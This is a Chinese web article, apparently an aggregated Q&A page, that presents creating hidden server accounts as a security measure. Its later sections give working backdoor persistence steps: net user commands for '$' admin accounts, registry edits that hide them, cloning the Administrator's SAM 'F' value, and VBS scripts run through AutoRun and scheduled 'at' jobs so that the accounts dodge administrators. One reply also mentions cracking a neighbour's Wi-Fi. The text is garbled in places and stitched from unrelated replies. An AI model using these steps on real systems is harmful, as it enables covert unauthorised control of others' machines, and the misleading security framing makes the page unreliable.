如何在服务器上创建隐藏账户 (在服务器新建隐藏账户)
在现代企业中,服务器是重要的数据存储与管理中心。为了确保服务器的安全性,许多企业会创建不同级别的账户,用于控制不同用户的访问权限。而隐藏账户是其中一种常用的账户类型,它可以给服务器管理人员提供一个额外的安全保障,以防止未经授权的访问。
那么,如何在服务器上创建一个隐藏账户呢?
之一步:登录服务器管理账户
你需要以管理员身份登录服务器管理账户。该账户通常包含有全局管理和控制权限,以保证对于服务器上所有数据和应用程序都有足够的掌控力。如果你不知道如何以管理员身份登录服务器,可以参考相应的服务器管理文档来实现。
第二步:创建一个隐藏账户
在服务器管理控制台中,你需要找到用户账户管理工具,进入账户管理模块。在该模块中,你可以看到已有的用户账户列表,包括用户名和访问权限等信息。接下来,你可以点击“新建账户”按钮,开始创建一个新的用户账户了。
在创建过程中,你需要注意以下几点:
1. 隐藏账户的用户名必须符合特殊的命名规则,以便通过特别的操作才能显示出来。
2. 为隐藏账户设置密码时,要确保密码足够复杂和安全,而且不要和其他账户的密码重复。
3. 尽量避免将隐藏账户和普通用户账户的访问权限相同化,以保证该账户的独立性和安全性。
第三步:隐藏新创建的账户
一旦新账户创建完成,你需要通过一些特别的操作,将其隐藏起来,以保证它不会出现在其他人员的用户账户列表中。
一种常见的方法是修改服务器的注册表,以便隐藏目标账户。具体操作步骤如下:
1. 运行“regedit”命令,打开注册表编辑器。
2. 找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList路径。
3. 在该路径下,你需要新建一个DWORD值,并将其命名为新创建的账户名。
4. 将DWORD值的数值设置为0,这样就可以将新账户隐藏了。
第四步:测试新创建的账户
在最后一步,你需要测试一下新创建的账户是否工作正常。你可以退出管理员账户,使用新账户登录服务器,以确保新账户可以访问那些已经授权给它的资源。你也可以依据需要,再次修改登录到新账户后的访问权限,以确保新账户的访问控制保持高度安全和独立。
:
在现代企业应用中,服务器是非常重要的资源,需要得到充分保护。创建隐藏账户是很好的一种安全手段,它可以提供一个额外的保护层,确保企业数据和应用程序只能被有权限的人员访问。通过以上设置步骤,你可以轻松创建一个隐藏账户,并将其保护好,以达到保障企业安全的效果。
相关问题拓展阅读:
如何创建一个隐藏的电脑用户
在计算机中创建一个隐藏的账户,同时也可作为远程登录的用户来远控计算机或者查看计算机的磁盘信息。(在虚拟机中进行演示)
过程步骤:
本地创建隐藏账户和建立隐藏“登录时账户显示”的注册表文件。
net user admin$ admin /add —在计算机中创建一个用户名为admin$,密码为admin的账户,此时建立的这个带$的账户是隐藏的。我们可以在cmd中运行net user,可以看到我们发现不了这个用户。打开“计算机管理”中的“本地用户和组”–“滑烂渗用户”中则可以看到存在admin$的账户。
net localgroup administrators admin$ /add —-将admin账户添加到管理员组中,便于以后对计算机进行控制。
至此,本地计算机的隐藏账户建立好了。
下面注销计算机,在计算机的登录界面还是可以看到这历乎个admin$的账户。
将登录界面的admin$账户也隐藏掉:
此时可以进入注册表中新建一个键,就可以将其隐藏了。键为:
中新建一个dword类型的名为admin$的键,其键值为”admin$”=dword:
快速打开方法为,在注册表编辑器regedit.exe中的菜单栏“编辑”中“查找”userlist,查找两次就可以快速定位信脊userlist这个键值了。
保存userlist下的键值为”yincang.reg”,便于下面的批处理时使用。
注销计算机,可以发现,此时admin$账户看不到了。
至此,在cmd下的net user和系统登录界面中都看不到admin$的影子了。唯一可以看到的是计算机管理中的用户下还是可以看到。我们说一般的用户是不会去查看最后一个地方的,这样我们就创建了一个相对隐藏较深的计算机账户。
点击“开始”→“运行”(或者按 win+R 组合键),输入“regedit”,回车,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\分支
右击SAM,选择“权限”选中“Administrators (FREESKYC-165D01\Administrators)”,将下面的“完全控制”和“读取”勾为“允许”,应用、确定。
点击“开始”→“运行”(或者按 win+R 组合键),输入“cmd”,回车,打开了命令行,键入如下命令:
net user abc$ 123 /add 回车,其中abc$为用户名(abc可以改,但是最后的$符号是必须有的),123为密码
再键入以下命令可以给abc$ 帐户添加管理员权限:net localgroup administrators abc$ /add
关闭注册表编辑器,在命令行下敲入 regedit ,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
再展开Names,
单击“Administrator”,看,右边的“类型”一列为“0x1f4”,于喊伍或是在左边找到“000001F4”并单击,然后双击右边的“F”,选中如图所示的数据并复制
假设刚才创建的用户是图中的me(记得后面要加 $ 符,否则不能达到隐藏的目的!) ,单击它,在右边的“类型”看到的是0x3f2
在左列找到000003F2并单击,双击右边的“F”选中如图所示的数据
按右键→粘贴,把刚才复制的内容替换上去,确定
在左列选中用户名 me ,然后点击“文件”→“导出”,将其保存(例如保存在桌面,文件名为 1.reg);再选中F2 ,将其导出(例如保存在桌面,文件名为 2.reg)
回到命令行,执行以下命令:
net user abc$ /del
即删除 abc 这个帐户
现在可以关闭刚才的所有窗口了,去到1.reg和2.reg所在的文件夹,双击1.reg,点击确定,将其导入注册表,同样,也将2.reg导入。之后这两个文件可以删除了
此时无论是在控制面板还是在命令行下执行 net user 命令,都无法看到 abc$ 这个帐户,但是可以用这个帐户登录!在登录界面按Ctrl+Alt+Del组合键,输入用户名(包括$)和密码就可以郑伍登录,与Administrator权限相橘敏同!
你的意思是偷他们家的无线网路信号?买一个卡王里面有带的搜索信号的驱动,还有破解人家密码的光滑扮盘破解的方法说明书上写漏让运的很详细认识字的人都能看的懂我前天买了一个,所以很了解。不过在你安装返梁的时候会遇到很多的问题。
欢迎如庆姿界差明面下,只有administrator账号时显示,有其他账号时默认不显示administrator账号。
要解决这个问题,用命令 regedit 打开注册表
找到下面的分支
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
寻找 Administrator 这个数据项,
把它的值修改成 “1”,
如果找不到就在空白处右击,新建一个”DWORD”值,改名”Administrator”,把它的指修改成 “1”,
那么你再次登陆时 就会在欢迎屏幕看到Administrator了
类似的如果把你自己新建的渣绝Owner(可能也没有,需要自己新建 )的值修改为”0″
如何建立一个类似administrator的账户,要隐藏的那种,开机不会自动显示用户名的
方法一:
dim wsh
set wsh=createobject(“wscript.shell”)
wsh.run “net user guest /active:yes”,0 (激活guest账号)
wsh.run “net user guest djhacker”,0 (修改guest密码为djhacker)
wsh.run “net localgroup administrators guest /add”,0 (添加guest到管理组)
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的:
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉
如果管理员把你动过手脚的guest账号停了,当时咐竖他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里好简凳面的路径运行那vbs文件
方法二
dim wsh
set wsh=createobject(“wscript.shell”)
wsh.run “at 01:02 net user xiaoyu xiaoyu /add”,0
wsh.run “at 01:03 net localgroup administrators xiaoyu /add”,0
wsh.run “at 01:40 net user xiaoyu /del”友旅,0
同样也是把此文件放到 注册表
hkey_local_machine\software\microsoft\command processor\autorun
同样也是改成 VBE或者 VBS都可以 这样就避免你的帐号 长期在线 容易被管理发现
在 01:02 时 会建个任务加一个 xiaoyu 用户密码位xiaoyu的用户
在 01:03 时 会把这个用户加到管理组
其最后一个命令就是在 01:40分时删除我们的管理帐号 所以你的时间就是在这30分钟 登陆上去
这样你就可以在晚上 特定的时间登陆上你控制的服务器 你下线时 这个帐号已经自动删除了
不过有的服务器 AT命令关闭了 你要到服务里面启动即可
还有启动路径是
hkey_local_machine\software\microsoft\windows\CurrentVersion\run
这个也可以在下面新建个健值 写如你的 VBE 文件
方法三:
参考以下BLOG
可以的,如果你想要,继续追问我告诉你,可是这衡正样会隐藏原先的administrator账户,茄拦亩必须按进入登录界面颤森按住ctrl+alt按两次del键才可以登录,要的话找我
关于在服务器新建隐藏账户的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。